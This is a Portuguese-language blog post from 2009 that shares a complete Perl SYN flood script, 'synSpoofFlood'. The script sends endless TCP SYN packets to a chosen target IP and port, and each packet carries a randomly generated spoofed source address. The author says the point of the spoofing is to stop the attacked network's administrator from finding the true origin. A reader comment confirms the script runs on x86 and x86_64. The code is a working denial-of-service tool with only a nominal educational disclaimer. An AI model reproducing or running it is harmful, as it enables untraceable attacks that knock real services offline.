Página Inicial > Perl, Segurança, hacking > SynSpoofFlood

SynSpoofFlood

2, novembro, 2009 Deixar um comentário Ir para os comentários

Essa semana fuçando em alguns arquivos antigos aqui, achei um script de syn flood feito em perl pelo iphelix e melhorei um pouco.

O Script original você especificava um ip falso para os pacotes, o ip do alvo e a porta. Então resolvi criar uma função que gera randomicamente um numero ip e envia os pacotes, sendo muito dificil para o administrador da rede atacada conseguir detectar a verdadeira origem do ataque, pois cada pacote vai com um endereço ip diferente. Abaixo segue o código do script, lembrando que é somente para fins de conhecimento.

#!/usr/bin/perl
# synSpoofFlood
# Author: Lucas Allan
#
# Based on Simple SYN Flooder by iphelix
# Requires perl, Net::RawIP module, and root privileges
#
# www.lucasallan.com
#

use Net::RawIP;

sub geraIP(){
	$range = 255;
	$iA = int(rand($range));
	$iB = int(rand($range));
	$iC = int(rand($range));
	$iD = int(rand($range));

	return $iA . "." . $iB . "." . $iC . "." . $iD;
}

sub attack(){
   ($dst,$port) = @ARGV;
   $a = new Net::RawIP;
   while(1) {
      $src_port = rand(65534)+1;
      $src = geraIP();
      $a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn => 1}});
      $a->send;
   }
}
if($#ARGV == 1) {
	attack();

} else {
   print "Target Port\n";
}
Categories: Perl, Segurança, hacking Tags: , ,
  1. Arcanjo
    30, dezembro, 2009 em 20:02 | #1
    Resposta | Citação

    Interessante usa alteração. Dá estudar bastante com isso..rs

    Para rodar em Linux, é necessário compilar as libs NetRaw do perl. O source pode ser encontrado em http://search.cpan.org/CPAN/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz

    Testei tanto em x86 como em x86_64 e funcionou. Bacana cara.. tá de parabéns.

  1. Nenhum trackback ainda.